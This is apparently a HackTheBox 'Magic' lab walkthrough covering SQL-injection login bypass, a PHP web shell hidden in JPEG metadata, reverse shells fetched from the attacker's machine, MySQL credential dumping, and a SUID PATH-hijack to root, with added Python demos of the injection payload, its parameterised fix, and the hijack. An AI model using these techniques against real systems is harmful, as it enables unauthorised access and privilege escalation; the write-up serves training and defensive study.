Magic — HackTheBox
Magic is a medium-rated machine created by TRX. The initial foothold is gained by bypassing authentication with SQL injection and uploading a JPEG image that carries a PHP web shell in its metadata. Once on the box, we move laterally to a more privileged user by collecting database credentials from a file and recovering a second password by dumping the MySQL databases. Root is obtained by abusing a SUID binary that runs commands without their full paths.
A quick nmap scan shows two open ports: 22 (SSH) and 80 (HTTP).
The HTTP port serves a gallery of some sort. Most of the images carry fragments of a hash, but piecing them together leads nowhere.
Clicking the ‘Login’ link at the bottom left leads to a login page. Common credentials failed, so I ran gobuster to find more directories in the background while trying SQL injection against the form.
The username field rejects whitespace, but that check is enforced in the browser only, so I fired up Burp Suite and intercepted the request to send SQL injection payloads directly. After a lot of trial and error, I successfully logged in.
The upload.php page I was redirected to only accepts .jpg and .png files, so uploading a plain PHP reverse shell did not work.
While researching how to craft a malicious JPEG, I came across a blog post about storing PHP code in the image’s metadata fields. The image stays a valid image, but the PHP code sits inside the file byte for byte. exiftool can write those fields just as well, so that is what I used.
The image uploaded successfully, but the response did not say where it was stored. The main page source references /images/fulls, but the upload did not land there.
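The post does not show the payload it used, so here is an added example (mine, not the author’s) of the bypass it describes: a login query built by string concatenation, the same query parameterised, and a payload that contains no whitespace at all, which matters here because the form rejected spaces. The table and credentials are constructed for the demo; the box’s real schema is not on the page, and the demo uses SQLite rather than MySQL, but the tokeniser behaviour being abused (no space needed between a string literal and a keyword) is the same in both.

```python
import sqlite3

# Constructed stand-in for the login table; not the box's real schema.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE login (username TEXT, password TEXT)")
    con.execute("INSERT INTO login VALUES ('admin', 's3cret')")
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str):
    """String-built query: whatever the user types becomes part of the SQL."""
    query = (
        "SELECT username FROM login "
        f"WHERE username='{username}' AND password='{password}'"
    )
    row = con.execute(query).fetchone()
    return row[0] if row else None


def login_safe(con: sqlite3.Connection, username: str, password: str):
    """Parameterised query: input is bound as data and is never parsed as SQL."""
    row = con.execute(
        "SELECT username FROM login WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# No whitespace anywhere, so a "no spaces" check on the field would not stop it.
# Sent in both fields the WHERE clause becomes
#   username=''OR'1'='1' AND password=''OR'1'='1'
# which is always true, so the first row (admin) comes back.
BYPASS = "'OR'1'='1"


def bypass_demo() -> dict:
    con = make_db()
    return {
        "vulnerable": login_vulnerable(con, BYPASS, BYPASS),  # 'admin'
        "safe": login_safe(con, BYPASS, BYPASS),              # None
        "legit": login_safe(con, "admin", "s3cret"),          # 'admin'
    }


if __name__ == "__main__":
    print(bypass_demo())
```

The fix is the second function: with bound parameters the quote in the payload is just a character in a string, and the lookup fails.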
Going to http://10.10.10.185/images/uploads/troll.php.jpg displays a cryptic page. It is the raw image bytes: the server evidently hands any filename containing .php to the PHP interpreter, which echoes everything outside the <?php ... ?> tags verbatim and executes only the code inside them, so the metadata payload is live even though the file still looks like an image.
Adding the parameter cmd=id proves that the exiftool trick worked: the command’s output appears in the page, so we have code execution.
I used this to fetch a PHP reverse shell (pentestmonkey’s) from a Python HTTP server on my machine.
The reverse shell is executed by going to /uploads/sh3ll.php.
Collecting MySQL Credentials
After getting a reverse shell, enumeration continues. After a few minutes of poking around, I found a file containing MySQL credentials.
The database user is theseus and the password is iamkingtheseus. Switching to the theseus user with that password did not work.
The mysql client was not installed on the machine, so I could not log in interactively. Luckily, mysqldump was present; it only needs the credentials and talks to the server directly, so it can still dump the databases.
I dumped every database and found another set of credentials in the dump. Switching to theseus with the new password worked.
More enumeration follows after escalating to theseus. While looking for low-hanging fruit, I found an unusual SUID binary, /bin/sysinfo.
I ran strings on the binary to get an idea of what it does. It runs four external commands; since sysinfo is set-uid and owned by root, each of them is a potential route to root:
lshw: displays hardware info about the machine.
fdisk: shows storage information.
cat: displays the contents of /proc/cpuinfo.
free: displays information about memory usage.
Because these commands are invoked by bare name rather than full path, we can trick the binary into executing a file of ours that contains malicious code.
If the code does not spell out the command’s full path, e.g. ‘cat’ instead of ‘/usr/bin/cat’, whatever launches the command walks the directories in $PATH in order and runs the first match. A SUID binary inherits the caller’s environment, $PATH included, unless it sanitises it explicitly, and sysinfo evidently does not. So we put a writable directory we control, such as /dev/shm, first in our $PATH, and sysinfo will look there first for every one of the commands listed above.
To keep it simple, I created a file named ‘cat’ in /dev/shm containing a single ‘/bin/bash’ line to spawn a root shell, made it executable, put /dev/shm first in my PATH variable and ran sysinfo. (One caveat: bash resets its effective UID to the real UID when the two differ unless it is started with -p, so against a SUID target that has not called setuid(0) itself, ‘/bin/bash -p’ is the line to use.)
A root shell was spawned, but none of my commands produced any output, most likely because sysinfo captures the output of each command to build its report, so the shell’s output never reached my terminal. I took a different approach.
I downloaded shell.py, a Python reverse shell, to /dev/shm on the target and changed the fake cat file to run ‘python3 /dev/shm/shell.py’ instead, so the shell connects back to my listener rather than relying on sysinfo’s stdout.
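The PATH hijack, and the reason the first attempt looked hung, as an added example (my code, not the author’s): it plants a fake command in a writable directory, prepends that directory to PATH, shows that a bare name now resolves to the fake while an absolute path does not, and runs the command the way a report-building SUID binary plausibly would, capturing stdout. Anything the fake prints is swallowed, exactly the symptom from the previous step, while its side effect (here a marker file; on the box, a reverse shell) still happens. The stand-in runner is an assumption about sysinfo’s internals, and the demo uses a temporary directory rather than /dev/shm so it runs anywhere.

```python
import os
import shutil
import subprocess
import tempfile

# Fake command body: prints something (which the caller will swallow) and leaves a side effect.
FAKE_TEMPLATE = "#!/bin/sh\necho hijacked\ntouch '{marker}'\n"


def hijacked_path(fake_dir: str) -> str:
    """PATH as the exploit sets it: our writable directory is searched first."""
    return fake_dir + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin")


def plant_fake(fake_dir: str, name: str) -> str:
    """Drop an executable script named like one of the commands sysinfo calls (cat, lshw, ...)."""
    path = os.path.join(fake_dir, name)
    with open(path, "w") as f:
        f.write(FAKE_TEMPLATE.format(marker=os.path.join(fake_dir, "marker")))
    os.chmod(path, 0o755)
    return path


def resolve(cmd: str, path: str):
    """The same lookup a shell or execvp() performs for a command name under a given PATH."""
    return shutil.which(cmd, path=path)


def run_like_sysinfo(argv: list, path: str) -> str:
    """Assumed stand-in for the SUID binary: runs a command by bare name with the inherited
    PATH and captures its stdout for its report. The fake's output therefore never reaches
    the terminal, which is why an interactive shell in the fake appears to hang."""
    env = dict(os.environ, PATH=path)
    return subprocess.run(argv, env=env, capture_output=True, text=True).stdout


def demo(name: str = "cat") -> dict:
    fake_dir = tempfile.mkdtemp()           # the post used /dev/shm
    try:
        fake = plant_fake(fake_dir, name)
        path = hijacked_path(fake_dir)
        real = shutil.which(name)           # the genuine binary, if this host has one
        return {
            "bare_resolves_to_fake": resolve(name, path) == fake,
            # An absolute path ignores PATH entirely: the fix is to hard-code full paths.
            "absolute_is_immune": real is not None and resolve(real, path) == real,
            "captured": run_like_sysinfo([name, "/proc/cpuinfo"], path),
            "side_effect": os.path.exists(os.path.join(fake_dir, "marker")),
        }
    finally:
        shutil.rmtree(fake_dir)


if __name__ == "__main__":
    print(demo("cat"))
```

The same run with the fake named lshw, fdisk or free behaves identically, which is what the next four steps confirm on the real binary. The defensive reading is the last dictionary entry: a SUID program should invoke helpers by absolute path and reset PATH itself rather than trust the caller’s environment.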
I tried escalating with lshw first. Notice that sysinfo’s output stops right after ‘Hardware Info’: that is the point where lshw is executed, which now means the malicious file I created in /dev/shm.
Next I tried it with cat. I renamed the file from ‘lshw’ to ‘cat’ and ran sysinfo again. This time the output stops after the CPU info, because that is where cat is executed.
Then fdisk: with the malicious file renamed to ‘fdisk’, the output stops after the disk info, where the fdisk command is executed.
And finally, with the file renamed to ‘free’, the output stops after ‘MEM Usage’, where the free command is executed.
Whichever of the four unqualified commands we hijack, the result is a root shell, and we can grab the root flag to finish it off.
Thank you for reading. Stay safe and have a good day!